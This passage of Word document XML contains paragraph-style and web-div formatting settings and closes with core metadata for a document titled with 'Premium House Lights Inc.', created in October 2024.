    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0054198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4198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64776">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="432021799">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="673731150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="842554755">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1666854881">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1737313075">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1782066214">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="18865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5F2DC-27E2-4844-9E01-078D2D3E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 Premium House Lights Inc.</dc:title>
  <dc:subject/>
  <dc:creator>Kodo Ku</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kodo Ku</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-23T21:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-23T21:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>